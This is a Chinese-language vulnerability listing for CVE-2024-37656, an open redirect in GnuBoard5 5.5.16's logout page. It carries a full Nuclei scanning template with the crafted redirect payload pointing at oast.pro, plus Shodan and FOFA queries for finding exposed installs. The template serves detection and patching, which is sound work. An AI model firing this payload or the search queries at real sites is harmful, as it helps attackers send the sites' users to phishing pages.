CVE-2024-37656: GnuBoard5 5.5.16 - Open Redirect

日期: 2025-11-18 | 影响软件: GnuBoard5 | POC: 已公开

漏洞描述

Gnuboard5 5.5.16 contains an open redirect vulnerability caused by insufficient URL parameter verification in bbs/logout.php, letting remote attackers redirect users to arbitrary URLs, exploit requires crafted URL parameter.

PoC代码[已公开]

id: CVE-2024-37656

info:
  name: GnuBoard5 5.5.16 - Open Redirect
  author: 0x_Akoko
  severity: medium
  description: |
    Gnuboard5 5.5.16 contains an open redirect vulnerability caused by insufficient URL parameter verification in bbs/logout.php, letting remote attackers redirect users to arbitrary URLs, exploit requires crafted URL parameter.
  impact: |
    Remote attackers can redirect users to malicious sites, potentially leading to phishing or information theft.
  remediation: |
    Update to the latest version of Gnuboard5.
  reference:
    - https://github.com/gnuboard/gnuboard5/issues/318
    - https://nvd.nist.gov/vuln/detail/CVE-2024-37656
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-37656
    cwe-id: CWE-601
    cpe: cpe:2.3:a:sir:gnuboard:5.5.16:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: sir
    product: gnuboard
    shodan-query: html:"GnuBoard5"
    fofa-query: body:"GnuBoard5"
  tags: cve,cve2024,redirect,gnuboard5

http:
  - method: GET
    path:
      - "{{BaseURL}}/gnuboard5/bbs/logout.php?url=/\\oast.pro"
      - "{{BaseURL}}/bbs/logout.php?url=/\\oast.pro"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*)(?:https?://|//|/\\\\)?[a-zA-Z0-9._@-]*oast\.pro.*$'

      - type: status
        status:
          - 302
# digest: 490a00463044022024c810e2dbb2565f1ee6b0dded88442176834b7c9b93dd9427be490880033aa5022048e1278f47886d3a1a50cf4f1bdb4abde3bfe55c119ac965f983bbc49a463806:922c64590222798bb761d5b6d8e72950